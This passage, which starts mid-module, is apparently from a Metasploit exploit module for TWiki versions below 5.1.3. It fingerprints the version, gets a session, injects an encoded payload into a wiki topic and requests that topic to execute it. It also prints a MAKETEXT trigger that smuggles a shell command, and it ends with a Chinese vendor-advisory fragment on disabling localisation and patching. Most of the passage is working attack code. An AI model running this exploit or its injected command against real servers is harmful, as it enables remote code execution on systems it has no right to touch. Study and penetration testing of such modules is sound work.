if not res or res.code != 302 or res.headers['Location'] =~ /oops/ or res.headers['Location'] !~ /#{@page}/
print_warning("Error injecting the payload")
print_status "#{res.code}\n#{res.body}\n#{res.headers['Location']}"
return nil
end
location = URI(res.headers['Location']).path
print_good("Payload injected on #{location}")
return location
end
# Fingerprints the target by fetching the TWiki WebHome page and reading
# the version string it advertises.
#
# @return [Exploit::CheckCode] Unknown when the page cannot be fetched or
#   does not answer HTTP 200; Appears for advertised versions below 5.1.3;
#   Safe for 5.1.3 and later; Detected when TWiki answers but no version
#   string can be parsed from the body.
def check
  @base = target_uri.path
  @base << '/' unless @base.end_with?('/')

  res = send_request_cgi('uri' => "#{@base}do/view/TWiki/WebHome")
  return Exploit::CheckCode::Unknown unless res && res.code == 200

  # The banner only yields single-digit components (d.d.d), so a plain
  # string comparison against "5.1.3" orders the versions correctly.
  banner = /This site is running TWiki version.*TWiki-(?<version>\d\.\d\.\d)/
  found = banner.match(res.body)
  return Exploit::CheckCode::Detected unless found

  version = found[:version]
  print_status("Version found: #{version}")
  version < '5.1.3' ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
end
# Module entry point. Resolves the topic path to use, normalises the base
# path, obtains a session (authenticated when USERNAME and PASSWORD are
# both set, anonymous otherwise), passes the encoded payload to
# inject_code and then requests the location it returns so the server
# renders the injected topic. Each stage that fails stops the run through
# fail_with.
#
# @return [void]
def exploit
  # Topic path: the TwikiPage option when given (made absolute), otherwise
  # a random topic name under Sandbox.
  page_opt = datastore['TwikiPage']
  @page =
    if page_opt && !page_opt.empty?
      page_opt.start_with?('/') ? page_opt.dup : "/#{page_opt}"
    else
      "/Sandbox/#{rand_text_alpha_lower(3).capitalize}#{rand_text_alpha_lower(3).capitalize}"
    end

  @base = target_uri.path
  @base << '/' unless @base.end_with?('/')

  # A session is only requested when both credentials are non-empty; the
  # anonymous path uses an empty session id.
  user = datastore['USERNAME']
  pass = datastore['PASSWORD']
  session =
    if user && !user.empty? && pass && !pass.empty?
      print_status("Trying login to get session ID...")
      do_login(user, pass)
    else
      print_status("Using anonymous access...")
      ""
    end
  fail_with(Exploit::Failure::Unknown, "Error getting a session ID") unless session

  print_status("Trying to inject the payload on #{@page}...")
  location = inject_code(session, payload.encoded)
  fail_with(Exploit::Failure::Unknown, "Error injecting the payload") unless location

  print_status("Executing the payload through #{location}...")
  res = send_request_cgi(
    'uri' => location,
    'cookie' => "TWIKISID=#{session}"
  )
  # The rendered topic is expected to echo a HASH marker; anything else is
  # treated as a failed execution.
  unless res && res.code == 200 && /HASH/.match?(res.body)
    fail_with(Exploit::Failure::Unknown, "Error executing the payload")
  end
  print_good("Exploitation was successful")
end
end
=begin
* Trigger:
%MAKETEXT{"test [_1] secondtest\\'}; `touch /tmp/msf.txt`; { #" args="msf"}%
=end
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 通过将flag {UserInterfaceInternationalisation} 设置为0禁用本地化操作。
厂商补丁:
TWiki
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: